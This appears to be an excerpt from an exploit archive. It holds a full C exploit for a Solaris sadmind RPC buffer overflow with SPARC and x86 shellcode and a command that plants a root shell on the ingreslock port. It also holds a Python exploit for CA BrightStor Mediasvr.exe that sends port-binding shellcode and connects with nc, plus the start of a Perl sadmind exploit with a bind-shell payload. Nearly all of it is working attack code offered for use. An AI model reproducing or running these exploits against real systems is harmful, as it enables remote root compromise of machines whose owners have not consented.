"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x 00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x01\x58\x00\x00\x00\x00\x 00\x00\x09\x00".
"\x00\x00\x03\x00\x00\x00\x02" . "-c" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x01\x59\x00".
"\x00\x00\x00\x00\x00\x09\x00\x00\x02\x01\x00\x00\x 02\x00".
$command . ("\x00" x (512 - length($command))).
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10".
"netmgt_endofargs";
my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;
return($res);
}
# [2003-09-19]
111 Solaris sadmind Remote Buffer Overflow Exploit
/************************************************** ***********************\
** **
** Super Solaris sadmin Exploit by optyx <[email protected]> **
** based on sadminsparc. and sadminx86.c by Cheez Whiz **
** **
\************************************************* ************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <rpc/rpc.h>
char shellsparc[] =
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff"
"\x90\x03\xe0\x5c\x92\x22\x20\x10\x94\x1b\xc0\x0f"
"\xec\x02\x3f\xf0\xac\x22\x80\x16\xae\x02\x60\x10"
"\xee\x22\x3f\xf0\xae\x05\xe0\x08\xc0\x2d\xff\xff"
"\xee\x22\x3f\xf4\xae\x05\xe0\x03\xc0\x2d\xff\xff"
"\xee\x22\x3f\xf8\xae\x05\xc0\x16\xc0\x2d\xff\xff"
"\xc0\x22\x3f\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff"
"\x2d\x63\xff";
char shellx86[] =
"\xeb\x45\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31"
"\xc0\x89\x46\xb7\x88\x46\xbc\x31\xc0\x50\x56\x8b"
"\x1e\xf7\xdb\x89\xf7\x83\xc7\x10\x57\x89\x3e\x83"
"\xc7\x08\x88\x47\xff\x89\x7e\x04\x83\xc7\x03\x88"
"\x47\xff\x89\x7e\x08\x01\xdf\x88\x47\xff\x89\x46"
"\x0c\xb0\x3b\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
"\xbe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68\xff\x2d\x63\xff";
int buflen[] = { 1076, 1056 };
int addrlen[] = { 560, 8 };
int lens[] = { 84, 76 };
int offset[] = { 688, 572 };
int alignment[] = { 4, 0 };
long int nops[] = { 0x801bc00f, 0x90 };
int junks[] = { 512, 536 };
char command[] = "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' "
"> /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f /tmp/.x;";
unsigned long int sp[] = { 0xefff9580, 0xefff9418, 0x080418ec, 0x08041798 };
#define FRAMELEN1 608
#define FRAMELEN2 4200
#define NETMGT_PROG 100232
#define NETMGT_VERS 10
#define NETMGT_PROC_PING 0
#define NETMGT_PROC_SERVICE 1
#define NETMGT_UDP_PING_TIMEOUT 30
#define NETMGT_UDP_PING_RETRY_TIMEOUT 5
#define NETMGT_UDP_SERVICE_TIMEOUT 1
#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2
#define NETMGT_HEADER_TYPE 6
#define NETMGT_ARG_INT 3
#define NETMGT_ARG_STRING 9
#define NETMGT_ENDOFARGS "netmgt_endofargs"
#define FW_VERSION "VERSION"
#define CLIENT_DOMAIN "CLIENT_DOMAIN"
#define FENCE "FENCE"
struct nm_send_header {
struct timeval timeval1;
struct timeval timeval2;
struct timeval timeval3;
unsigned int uint1;
unsigned int uint2;
unsigned int uint3;
unsigned int uint4;
unsigned int uint5;
struct in_addr inaddr1;
struct in_addr inaddr2;
unsigned long ulong1;
unsigned long ulong2;
struct in_addr inaddr3;
unsigned long ulong3;
unsigned long ulong4;
unsigned long ulong5;
struct timeval timeval4;
unsigned int uint6;
struct timeval timeval5;
char *string1;
char *string2;
char *string3;
unsigned int uint7;
};
struct nm_send_arg_int {
char *string1;
unsigned int uint1;
unsigned int uint2;
int int1;
unsigned int uint3;
unsigned int uint4;
};
struct nm_send_arg_string {
char *string1;
unsigned int uint1;
unsigned int uint2;
char *string2;
unsigned int uint3;
unsigned int uint4;
};
struct nm_send_footer {
char *string1;
};
struct nm_send {
struct nm_send_header header;
struct nm_send_arg_int version;
struct nm_send_arg_string string;
struct nm_send_arg_int fence;
struct nm_send_footer footer;
};
struct nm_reply {
unsigned int uint1;
unsigned int uint2;
char *string1;
};
bool_t xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)
{
char *addr;
size_t size = sizeof(struct in_addr);
if(!xdr_long(xdrs, &objp->timeval1.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval1.tv_usec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval2.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval2.tv_usec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval3.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval3.tv_usec))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint5))
return (FALSE);
addr = (char *) &objp->inaddr1.s_addr;
if(!xdr_bytes(xdrs, &addr, &size, size))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong1))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong2))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong3))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong4))
return (FALSE);
if(!xdr_u_long(xdrs, &objp->ulong5))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval4.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval4.tv_usec))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint6))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval5.tv_sec))
return (FALSE);
if(!xdr_long(xdrs, &objp->timeval5.tv_usec))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string2))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint7))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)
{
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_int(xdrs, &objp->int1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)
{
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string2))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)
{
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_send(XDR *xdrs, struct nm_send *objp)
{
if(!xdr_nm_send_header(xdrs, &objp->header))
return (FALSE);
if(!xdr_nm_send_arg_int(xdrs, &objp->version))
return (FALSE);
if(!xdr_nm_send_arg_string(xdrs, &objp->string))
return (FALSE);
if(!xdr_nm_send_arg_int(xdrs, &objp->fence))
return (FALSE);
if(!xdr_nm_send_footer(xdrs, &objp->footer))
return (FALSE);
return (TRUE);
}
bool_t xdr_nm_reply(XDR *xdrs, struct nm_reply *objp)
{
if(!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if(!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
return (TRUE);
}
void usage(char *prog)
{
fprintf(stderr, "usage: %s -t target -a arch [-s size]", prog);
fprintf(stderr, " [-i increment] [-p]\n");
fprintf(stderr, "\tarchitectures:\n");
fprintf(stderr, "\t0 - Solaris SPARC 2.6\n");
fprintf(stderr, "\t1 - Solaris SPARC 2.7 (7.0)\n");
fprintf(stderr, "\t2 - Solaris x86 2.6\n");
fprintf(stderr, "\t3 - Solaris x86 2.7 (7.0)\n\n");
exit(-1);
}
int exp(char *host, int arch, unsigned long int sp, int pinging)
{
CLIENT *cl;
struct nm_send send;
struct nm_reply reply;
struct timeval tm;
enum clnt_stat stat;
int c, i, len, slen, clen, junk, a;
char *cp, *buf;
unsigned long int addr, fp;
a = (int) arch / 2;
buf = (char *) malloc(buflen[a] + 1);
if(a)
{
/* Solaris x86 */
memset(buf, nops[a], buflen[a]);
junk = junks[arch - 2];
junk &= 0xfffffffc;
for (i = 0, cp = buf + alignment[a]; i < junk / 4; i++)
{
*cp++ = (sp >> 0) & 0xff;
*cp++ = (sp >> 8) & 0xff;
*cp++ = (sp >> 16) & 0xff;
*cp++ = (sp >> 24) & 0xff;
}
addr = sp + offset[a];
for (i = 0; i < addrlen[a] / 4; i++)
{
*cp++ = (addr >> 0) & 0xff;
*cp++ = (addr >> 8) & 0xff;
*cp++ = (addr >> 16) & 0xff;
*cp++ = (addr >> 24) & 0xff;
}
slen = strlen(shellx86);
clen = strlen(command);
len = clen;
len++;
len = -len;
shellx86[lens[a]+0] = (len >> 0) & 0xff;
shellx86[lens[a]+1] = (len >> 8) & 0xff;
shellx86[lens[a]+2] = (len >> 16) & 0xff;
shellx86[lens[a]+3] = (len >> 24) & 0xff;
cp = buf + buflen[a] - 1 - clen - slen;
memcpy(cp, shellx86, slen);
cp += slen;
memcpy(cp, command, clen);
cp += clen;
*cp = '\xff';
}
else
{
/* Solaris SPARC */
memset(buf, '\xff', buflen[a]);
fp = sp + FRAMELEN1 + FRAMELEN2;
fp &= 0xfffffff8;
addr = sp + offset[a];
addr &= 0xfffffffc;
for(i = 0, cp = buf + alignment[a]; i < addrlen[a] / 8; i++)
{
*cp++ = (fp >> 24) & 0xff;
*cp++ = (fp >> 16) & 0xff;
*cp++ = (fp >> 8) & 0xff;
*cp++ = (fp >> 0) & 0xff;
*cp++ = (addr >> 24) & 0xff;
*cp++ = (addr >> 16) & 0xff;
*cp++ = (addr >> 8) & 0xff;
*cp++ = (addr >> 0) & 0xff;
}
slen = strlen(shellsparc);
clen = strlen(command);
len = buflen[a] - 1 - clen - slen - addrlen[a] - alignment[a];
len &= 0xfffffffc;
for(i = 0; i < lens[a] / 4; i++)
{
*cp++ = (nops[a] >> 24) & 0xff;
*cp++ = (nops[a] >> 16) & 0xff;
*cp++ = (nops[a] >> 8) & 0xff;
*cp++ = (nops[a] >> 0) & 0xff;
}
len = clen;
len++;
len = -len;
shellsparc[lens[a]+0] = (len >> 24) & 0xff;
shellsparc[lens[a]+1] = (len >> 16) & 0xff;
shellsparc[lens[a]+2] = (len >> 8) & 0xff;
shellsparc[lens[a]+3] = (len >> 0) & 0xff;
memcpy(cp, shellsparc, slen);
cp += slen;
memcpy(cp, command, clen);
}
buf[buflen[a]] = '\0';
memset(&send, 0, sizeof(struct nm_send));
send.header.uint2 = NETMGT_HEADER_TYPE;
send.header.string1 = "";
send.header.string2 = "";
send.header.string3 = "";
send.header.uint7 =
strlen(FW_VERSION) + 1 +
(4 * sizeof(unsigned int)) + sizeof(int) +
strlen(CLIENT_DOMAIN) + 1 +
(4 * sizeof(unsigned int)) + strlen(buf) + 1 +
strlen(FENCE) + 1 +
(4 * sizeof(unsigned int)) + sizeof(int) +
strlen(NETMGT_ENDOFARGS) + 1;
send.version.string1 = FW_VERSION;
send.version.uint1 = NETMGT_ARG_INT;
send.version.uint2 = sizeof(int);
send.version.int1 = 1;
send.string.string1 = CLIENT_DOMAIN;
send.string.uint1 = NETMGT_ARG_STRING;
send.string.uint2 = strlen(buf);
send.string.string2 = buf;
send.fence.string1 = FENCE;
send.fence.uint1 = NETMGT_ARG_INT;
send.fence.uint2 = sizeof(int);
send.fence.int1 = 666;
send.footer.string1 = NETMGT_ENDOFARGS;
cl = clnt_create(host, NETMGT_PROG, NETMGT_VERS, "udp");
if (cl == NULL)
{
clnt_pcreateerror("clnt_create");
return 0;
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
if (!pinging)
{
tm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT;
tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}
tm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT;
tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}
stat = clnt_call(cl, NETMGT_PROC_SERVICE,
xdr_nm_send, (caddr_t) &send,
xdr_nm_reply, (caddr_t) &reply, tm);
if (stat != RPC_SUCCESS)
{
clnt_perror(cl, "clnt_call");
fprintf(stdout, "now check if exploit worked;\n");
return 0;
}
fprintf(stderr, "exploit failed; "
"RPC succeeded and returned { %u, %u, \"%s\" }\n",
reply.uint1, reply.uint2, reply.string1);
clnt_destroy(cl);
exit(1);
}
else
{
tm.tv_sec = NETMGT_UDP_PING_TIMEOUT;
tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}
tm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT;
tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}
stat = clnt_call(cl, NETMGT_PROC_PING,
xdr_void, NULL,
xdr_void, NULL, tm);
if (stat != RPC_SUCCESS)
{
clnt_perror(cl, "clnt_call");
exit(1);
}
clnt_destroy(cl);
return 0;
}
}
int main(int argc, char *argv[])
{
int i, arch;
char *host = "";
int pinging = 0, inc = 4, size = 2048;
unsigned long int addr;
for(i=0;i<argc;i++)
{
if(!strcmp(argv[i], "-t"))
host = argv[i+1];
if(!strcmp(argv[i], "-a"))
arch = atoi(argv[i+1]);
if(!strcmp(argv[i], "-i"))
inc = atoi(argv[i+1]);
if(!strcmp(argv[i], "-s"))
size = atoi(argv[i+1]);
if(!strcmp(argv[i], "-p"))
pinging = 1;
}
if(arch > 3 || arch < 0)
usage(argv[0]);
if(size < 0)
usage(argv[0]);
if(inc < 0)
usage(argv[0]);
for(i = 0; i < size; i+=inc)
{
addr = sp[arch] + i;
exp(host, arch, addr, pinging);
addr = sp[arch] - i;
exp(host, arch, addr, pinging);
}
execl("telnet", host, "ingreslock");
return 0;
}
// [2000-12-01]
111 CA BrightStor Backup 11.5.2.0 (Mediasvr.exe) Remote Code Exploit
#!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit
# (Previously Unknown)
#
# There seems to be an design error in the handling of RPC data with xdr procedures
# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are
# processed as a particular address (xdr_handle_t data which is run through multiple bit
# shifts, and reversing of bytes), and eventually loaded into ECX.
#
# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may
# be Null Credentials and Auth?) leads to an exploitable condition.
#
# .text:0040AACD 008 mov ecx, [esp+8]
# .text:0040AAD1 008 mov dword_418820, esi
# .text:0040AAD7 008 push offset dword_418820
# .text:0040AADC 00C mov eax, [ecx]
# .text:0040AADE 00C call dword ptr [eax+2Ch]
#
# At this point, you have control of ECX (esp+8 is your address data). The data from the packet
# is stored in memory and is relatively static (see NOTE).
#
# The address is then loaded into EAX, and then called as EAX+2Ch, which is
# controllable data from the packet. In this code, I just jump ahead to
# the portbinding shellcode.
#
# NOTE: The only issue I have found is when the system is rebooted, the packet data
# appears at a higher memory location when Mediasvr.exe crashes
# and is restarted. I have accounted for this in the code, when the port that
# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after
# a reboot
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest
# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which
# is more then likely the memory locations)
#
# The patches include the following updates to Mediasvr.exe
# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp
#
# CA has been notified
#
# Author: M. Shirk
# Tester: Tebodell
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com
#
# Use at your own Risk: You have been warned
#------------------------------------------------------------------------
import os
import sys
import time
import socket
import struct
#------------------------------------------------------------------------
#Portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x 4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x 4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x 46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x 46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x 45\x4e\x4b\x48"
shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x 4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x 4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x 41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x 4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x 50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x 47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x 4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x 49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x 4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x 4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x 43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x 4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x 4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x 4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x 4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x 43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x 48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x 4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x 49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x 41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x 44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x 46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x 41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x 42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x56"
shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x 47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x 4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
#------------------------------------------------------------------------
#First Packet
rpc_packet1="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x 00\x00\x00"
rpc_packet1+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
#Prodcedure 191 and nulls
rpc_packet1+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
#Apparently these 4 bytes can be anything
rpc_packet1+="\x00\x00\x00\x00"
#This value is important for the location of the next address
rpc_packet1+="\x00\x00\x00\x00"
#Hardcoded Address loaded into ECX
rpc_packet1+="\x00\xae\x27\x64"
#Just spacing
rpc_packet1+="\x41\x42\x43\x44"
#Addess in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
rpc_packet1+="\x3c\x27\xae\x00"
#jump to shellcode for packet 1
rpc_packet1+="\x6c\x27\xae\x00"
rpc_packet1+="\xeb\x01"
rpc_packet1+=shellcode
#------------------------------------------------------------------------
#Second Packet
rpc_packet2="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x 00\x00\x00"
rpc_packet2+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
#Procedure 191 and nulls
rpc_packet2+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
#Apparently these 4 bytes can be anything
rpc_packet2+="\x00\x00\x00\x00"
#This value is important for the location of the next address
rpc_packet2+="\x00\x00\x00\x00"
#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been
#restarted
rpc_packet2+="\x00\x9e\x27\x64"
#Just spacing
rpc_packet2+="\x41\x42\x43\x44"
#Addess stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
rpc_packet2+="\x3c\x27\x9e\x00"
#jump to shellcode for packet 2
rpc_packet2+="\x6c\x27\x9e\x00"
rpc_packet2+="\xeb\x01"
rpc_packet2+=shellcode
# Portmap request for Mediasvr.exe
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x 00\x00\x00"
rpc_portmap_req+="\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x 03\x00\x00"
rpc_portmap_req+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00"
rpc_portmap_req+="\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x 00\x00\x00"
#------------------------------------------------------------------------
def GetMediaSvrPort(target):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,111))
sock.send(rpc_portmap_req)
rec = sock.recv(256)
sock.close()
port1 = rec[-4]
port2 = rec[-3]
port3 = rec[-2]
port4 = rec[-1]
port1 = hex(ord(port1))
port2 = hex(ord(port2))
port3 = hex(ord(port3))
port4 = hex(ord(port4))
port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(por t4,16))
port = int(port,16)
if port < 1100:
print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port)
ExploitMediaSvr(target,port,1)
else:
print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port)
ExploitMediaSvr(target,port,2)
def ExploitMediaSvr(target,port,p):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
if p == 1:
sock.send(rpc_packet1)
elif p == 2:
sock.send(rpc_packet2)
sock.close ()
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
print '[+] Author: Shirkdog'
print '[+] Usage: %s <target ip>\n' % sys.argv[0]
sys.exit(-1)
print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
print '[+] Author: Shirkdog'
GetMediaSvrPort(target)
print '[+] Exploit sent. Using nc to connect to: %s on port 4444' % target
time.sleep(3)
connect = "/usr/bin/nc -vn " + target + " 4444"
os.system(connect)
# [2007-03-29]
111 Solaris 9 [UltraSPARC] sadmind Remote Root Exploit
#!/usr/bin/perl
# holygrail2 #
#---------------------------------------------------------------------------------#
# SunOS 5.9 [UltraSPARC] sadmind Remote Root Exploit by KingCope in 2008 #
# #
# Most of work was shamelessy ripped from HD-Moore and RISE-Security exploits!!! #
# Bug found by RISE-Security. #
# Sparc exploit by KingCope [[email protected]] #
# Maybe I will extend this to Solaris 8/10/11 in futura ?? #
# thanks to alex,andi,adize ... #
# #
################################################## #################################
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
print "holygrail2 vs. SunOS 5.9 sadmind\nby kcope in 2008\nbinds a shell to port 5555\n";
my $host = $ARGV[0];
if ($host eq "") {
print "usage: perl holygrail2.pl <address>\n";
exit(-1);
}
# solaris_sparc_bind - LPORT=5555 Size=232 Encoder=Sparc http://metasploit.com
my $payload =
"\x23\x32\xde\xd7\xa2\x14\x62\x6f\x20\xbf\xff\xff\x 20\xbf\xff\xff".
"\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\x ea\x23\xe0\x20".
"\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x 9e\x03\xe0\x04".
"\x57\x50\xfe\x68\xff\xb6\xde\x77\x69\xad\xde\x7c\x 01\xcb\x1e\x89".
"\xbb\xfc\xbe\x8f\x2b\xec\x9e\x8d\xce\x1c\xfe\x77\x 5f\xcc\xdf\x7f".
"\x8f\xce\xa0\x87\x11\x10\xdf\xf2\xf1\x04\xfe\x4f\x 11\x06\xbe\x5f".
"\x11\x6b\x7e\x6b\x03\x4f\x21\x83\xb7\x80\x01\xb3\x 35\xb0\x61\x5b".
"\xa8\x60\x42\x93\x1b\x83\x3d\x5b\x09\x94\x62\x9a\x af\x84\x42\x75".
"\x3e\x74\xa3\x8d\x91\x77\x1c\x75\x83\x62\x23\x8c\x 37\x80\xe3\x87".
"\xb5\xb4\xc3\x7d\x28\x65\x24\x89\x9b\xa6\x9b\x71\x 8f\xb8\xc4\x82".
"\x3d\xa9\x24\x8d\xd5\x6b\x84\x8c\x54\x7b\xe4\xb0\x c9\xab\xc4\xc4".
"\xf8\xf3\xfb\x28\x2d\x0f\xbb\x28\x59\x15\x04\xc3\x 40\x21\x5c\x49".
"\x22\x22\x7c\x03\x01\x41\xa2\x01\xd5\x75\xfb\xa5\x 47\x5a\x5b\xcd".
"\x87\xa6\x24\x3d\x97\xfa\xe4\x45\xd7\xde\xa4\x49\x 5a\x30\xfb\x8a".
"\xcb\xe0\xdb\xe4\xec\x01\x1b\xf4";
my $patchaddr = pack("N", 0xffbf83d8);
